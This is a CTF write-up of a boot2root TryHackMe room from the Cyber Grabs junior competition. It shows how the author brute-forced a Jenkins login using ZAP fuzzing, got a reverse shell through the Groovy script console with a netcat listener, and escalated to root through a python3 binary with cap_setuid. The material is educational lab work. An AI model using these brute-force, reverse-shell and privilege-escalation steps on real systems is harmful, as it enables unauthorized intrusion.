The Cyber Grabs — Boot2root
This was the Cyber Grabs “CTF 0x03: Junior” competition that ran for 12 hours on Sunday, 6th February. It was a well thoughtout CTF for beginners, that included a number of areas such as:
- crypto
- forensics
- web
- reverse
- osint
- misc
I will cover the boot2root section, which was prepared as a TryHackMe room and created by MrGrep. Let’s make a start and as always lets go through initial enumeration.
ping
Now we have a stable target let’s further enumerate.
So we have three ports showing. Port 21, which is closed, leaving us with ports 80 and 8080. Let’s see what these have to provide us with. Two further scans with nikto and gobuster may provide some more details.
gobuster
So it looks like we have a robots.txt. Looks like that provides two folders:
/s3cret
/confidentialLooking at s3cret it appears to be a password list.
And with confidential it appears to be a base32/64 of sorts.
I did try spend some time on the confidential data, but in the end it turned out to be base32 (with non-alphabet characters selected) giving us Lorem Ipsum text.
brute force
With a password list, we need a user. Remember the challenge description, well that has a possible option. We are here to assist Alison.
I used ZAP to investigate the username:password. Having checked port 80, this left us with port 8080. I mentioned that I ran nikto, and it provided some interesting details.
Looks like we have a Jenkin session found (Version 2.319.2) What is Jenkins I hear you ask.
From Google: Jenkins is used to build and test your product continuously, so developers can continuously integrate changes into the build. Jenkins is the most popular open source CI/CD tool on the market today and is used in support of DevOps, alongside other cloud native tools.
Now on port 8080, we have a login screen. So let us do a test login from the ZAP built in browser. For those that don’t know what ZAP is:
From Google: OWASP ZAP (short for Zed Attack Proxy) is an open-source web application security scanner. It is intended to be used by both those new to application security as well as professional penetration testers.
It is one of the most active Open Web Application Security Project (OWASP) projects[2] and has been given Flagship status.
When used as a proxy server it allows the user to manipulate all of the traffic that passes through it, including traffic using https.
Now this fails, but is recorded by ZAP.
We can see the password and username, so let’s right click in the request box and use the Fuzz command. (Repeater in Burp Suite)
Fuzz allows us to select areas of the request and let it work through lists to brute force, in case the passwords. So highlight the test_password, then click add.
Let’s add a payload by clicking add again.
From the dropdown select file and then search for your password text file. In this case I have saved the information from /s3cret in a file called secret.txt.
Click Add and then OK.
Now we are back at the Fuzzer screen. Let’s start the brute forcing of the login screen with the password file. Click Start Fuzzer
Once the fuzzer starts to run, it will go through each combination, however it will not return a successful password. What we need to do is investigate the response tab. Once it has completed, click the “Size Response Header.”
Notice the majority of the byte sizes are 316. Notice the lower size of 312 bytes. This is pointing to elizabeth1. Let’s try that with the known username alison.
This gives us access to the Jenkins dashboard.
jenkins enumeration
I have seen Jenkins before on another box challenge and thought I would try it again. A good source of infomation is hacktricks and the one I will be using utilises the addition of the /script directory to the 8080 URL. This allows me to add a groovy script and run it, hopefully providing a reverse shell.
The script comes from github frohoff
All we need to do is add the script, amend the attacker IP and port and click run. Be aware that the cmd.exe should be changed for /bin/bash in Linux. Just before we run, we set up the netcat service ready for the reverse shell.
┌──(karti㉿kali-ctf)-[~]
└─$ nc -nlvp 4444
Listening on 0.0.0.0 4444Clicking Run gives us the reverse shell.
Now we have a shell, lets make it interactive:
┌──(karti㉿kali-ctf)-[~]
└─$ nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.136.154 53788
id
uid=110(jenkins) gid=113(jenkins) groups=113(jenkins)
python3 -c 'import pty; pty.spawn("/bin/bash")'
jenkins@cyberrabs:/$ export TERM=xterm
export TERM=xterm
jenkins@cyberrabs:/$ ^Z
zsh: suspended nc -nlvp 4444
┌──(karti㉿kali-ctf)-[~]
└─$ stty raw -echo; fg 148 ⨯ 1 ⚙
[1] + continued nc -nlvp 4444jenkins@cyberrabs:/$
Now to search for the user flag.
jenkins@cyberrabs:/$ ls
bin dev initrd.img lib64 mnt root snap sys var
boot etc initrd.img.old lost+found opt run srv tmp vmlinuz
cdrom home lib media proc sbin swap.img usr vmlinuz.old
jenkins@cyberrabs:/$ cd /home
jenkins@cyberrabs:/home$ ls
mrgrep
jenkins@cyberrabs:/home$ cd mrgrep/
jenkins@cyberrabs:/home/mrgrep$ ls
python3 user.txt
jenkins@cyberrabs:/home/mrgrep$ nl user.txt
1 MN4WEZLSM5ZGCYTTPNFDG3TLNFXDKX2FGRZVSX2QGNQTKWL5A quick check in Cyberchef tells us it is encoded with base32:
- cybergrabs{J*****_E***_P*****}
privilage escalation
Let’s go through the basic checks for escalation. Firstly sudo -l but with no user password, we won’t get any information from that. Next we will look for suid files that will allow us to run binaries with additional permissions. The search, using find is:
find / -perm -4000 2>/dev/nullThis will find all files with suid and those without will be sent to /dev/null (not seen in output)
jenkins@cyberrabs:/home/mrgrep$ find / -perm -4000 2>/dev/null
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/at
/usr/bin/newuidmap
/usr/bin/sudo
/usr/bin/passwd
/bin/mount
/bin/umount
/bin/ping
/bin/fusermount
/bin/suThese are looking to be standard binaries with nothing jumping out. An excellent source to check is GTFOBINS that allows you to search for specific binaries.
From the site: GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
Next we will check capabilities. In a smilar search for suid, this will provide capabilities on the box for you to review.
getcap -r / 2>/dev/nullThe -r is just a recursive search with all other files going again to /dev/null.
jenkins@cyberrabs:/home/mrgrep$ getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
/home/mrgrep/python3 = cap_setuid+epSo one that is obvious is the mrgrep python capability. Let’s search GTFOBINS again.
if we click on Capabilities, it will give us some further details on how we can gain root access:
We take this and gain root access.
jenkins@cyberrabs:/$ /home/mrgrep/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=113(jenkins) groups=113(jenkins)Great, now we just need to find the root flag and we have completed the box.
# nl /root/root.txt
1 Hello Player!!
2 This is MrGrep.
3 If you have reached so far I would like to congratulate you, though it was an easy box ;)
4 If you want to connect with me you can ping me anytime on my twitter : @imabhisarpandey
5 Thanks for solving this box.
6 Your Flag:
7 cybergrabs{C*********_J*_C**_P******}
summary
A good box, only issue I had was that I spend a long time trying to brute force the login. Sometimes these things are sent to try us!!